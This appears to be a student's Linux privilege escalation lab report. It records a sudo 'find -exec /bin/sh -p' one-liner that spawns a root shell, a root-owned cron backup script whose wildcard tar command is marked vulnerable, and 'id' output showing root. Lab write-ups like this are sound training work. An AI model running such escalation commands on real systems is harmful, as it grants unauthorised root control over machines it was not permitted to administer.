==================================================
SESSION 23: ESCALATION PATH REPORT (LINUX)
==================================================
MICRO-LAB (SUDO):
1. Command used to escalate via 'find': 
   sudo find . -exec /bin/sh -p \; -quit

DEEP DIVE (CRON):
1. Name of the root-owned script found:
   /usr/local/bin/backup.sh
2. The specific command inside that script that was vulnerable:
   tar -cf /home/limited_user/backups/backup.tar *
3. Final proof of root (output of 'id'):
  uid=0(root) gid=0(root) groups=0(root)
